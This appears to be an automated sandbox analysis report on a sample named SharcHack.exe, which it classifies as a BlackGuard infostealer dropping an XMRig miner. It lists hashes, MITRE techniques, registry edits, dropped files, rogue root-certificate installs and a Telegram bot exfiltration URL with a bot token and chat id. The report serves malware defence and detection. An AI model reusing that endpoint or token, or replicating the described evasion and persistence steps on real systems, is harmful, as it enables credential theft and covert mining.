blackguard | 9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193

Analysis

max time kernel
149s
max time network
143s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
28-12-2024 21:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SharcHack.exe
Size

39.9MB
MD5

796310542e9fb2886de3f8cbdf88c9fa
SHA1

01dc8e64ff23db2f177e3d999c12329bfcd206d3
SHA256

9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193
SHA512

73295b9cfa07432b21d1f0d0bad360460f32d7e0170dc84406a35f4dfe2b1519fdc4028299f1075385ae4ab738be1e5bfffd7335c1038e2126669834e9a50966
SSDEEP

786432:Y31/CaCJz7+GWl3LNCxuEnwFho+zM77UDZiZCd08jFZJAI5E70TZFHng:URCR6GWl3LMEXFhV0KAcNjxAItjg

Score

10^/10

blackguard xmrig discovery evasion execution miner persistence spyware stealer upx

Malware Config

Extracted

Family

blackguard

https://api.telegram.org/bot6540906397:AAG08fPgT-V7I17vtz49STaZEuwqXqKshuM/sendMessage?chat_id=5445185021

Signatures

BlackGuard
Infostealer first seen in Late 2021.
stealer blackguard
Blackguard family
blackguard

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

description	pid	Process	procid_target
PID 2580 created 1152	2580	3.exe	20
PID 2580 created 1152	2580	3.exe	20
PID 2580 created 1152	2580	3.exe	20
PID 2580 created 1152	2580	3.exe	20
PID 2580 created 1152	2580	3.exe	20
PID 1404 created 1152	1404	updater.exe	20
PID 1404 created 1152	1404	updater.exe	20
PID 1404 created 1152	1404	updater.exe	20
PID 1404 created 1152	1404	updater.exe	20
PID 1404 created 1152	1404	updater.exe	20
PID 1404 created 1152	1404	updater.exe	20
PID 408 created 1152	408	conhost.exe	20
PID 1404 created 1152	1404	updater.exe	20

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 13 IoCs

miner

resource	yara_rule
behavioral1/memory/1488-333-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1488-334-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1488-339-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1488-347-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1488-351-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1488-355-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1488-374-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1488-378-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1488-382-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1488-386-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1488-390-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1488-394-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1488-398-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
844	powershell.exe
2976	powershell.exe
1900	powershell.exe
1744	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 6 IoCs

pid	Process
2580	3.exe
1680	VegaStealer_v2.exe
3064	CheatEngine75.exe
2340	CheatEngine75.tmp
3056	v2.exe
1404	updater.exe

Loads dropped DLL 15 IoCs

pid	Process
1904	SharcHack.exe
1904	SharcHack.exe
1904	SharcHack.exe
1904	SharcHack.exe
3064	CheatEngine75.exe
1680	VegaStealer_v2.exe
3056	v2.exe
3056	v2.exe
3056	v2.exe
3056	v2.exe
3056	v2.exe
3056	v2.exe
3056	v2.exe
2340	CheatEngine75.tmp
1224	taskeng.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Checks for any installed AV software in registry 1 TTPs 9 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\SOFTWARE\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	CheatEngine75.tmp
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\SOFTWARE\AVAST Software\Avast	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\SOFTWARE\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\Browser\Installed	CheatEngine75.tmp

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	freegeoip.app
6	freegeoip.app
16	ip-api.com

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2128	powercfg.exe
2856	powercfg.exe
2404	cmd.exe
2584	powercfg.exe
1516	powercfg.exe
1124	powercfg.exe
1948	cmd.exe
1216	powercfg.exe
2764	powercfg.exe
2380	powercfg.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1404 set thread context of 408	1404	updater.exe	88
PID 1404 set thread context of 1488	1404	updater.exe	94

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1488-319-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1488-333-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1488-334-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1488-339-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1488-347-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1488-351-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1488-355-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1488-374-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1488-378-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1488-382-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1488-386-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1488-390-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1488-394-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1488-398-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	3.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2088	sc.exe
1852	sc.exe
1652	sc.exe
352	sc.exe
2784	sc.exe
2792	sc.exe
1592	sc.exe
984	sc.exe
332	sc.exe
2944	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SharcHack.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VegaStealer_v2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.tmp

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	v2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	v2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CheatEngine75.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\	CheatEngine75.tmp

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1320	WMIC.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 1086ab326e59db01	powershell.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d4624030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e260f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	CheatEngine75.tmp

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2432	schtasks.exe
2492	schtasks.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	7	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3056	v2.exe
3056	v2.exe
3056	v2.exe
3056	v2.exe
2580	3.exe
2580	3.exe
844	powershell.exe
2580	3.exe
2580	3.exe
2580	3.exe
2580	3.exe
2580	3.exe
